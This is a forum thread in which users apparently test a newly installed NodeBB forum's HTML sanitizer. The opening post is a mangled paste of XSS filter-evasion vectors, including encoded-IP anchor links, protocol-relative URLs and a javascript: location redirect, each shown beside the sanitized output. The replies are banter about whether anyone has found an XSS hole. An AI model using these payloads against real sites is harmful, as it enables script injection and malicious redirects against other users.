<A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>


  • This post is deleted!


  • Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.



  • @anonymous234 no, @Maciejasjmj found one.


Log in to reply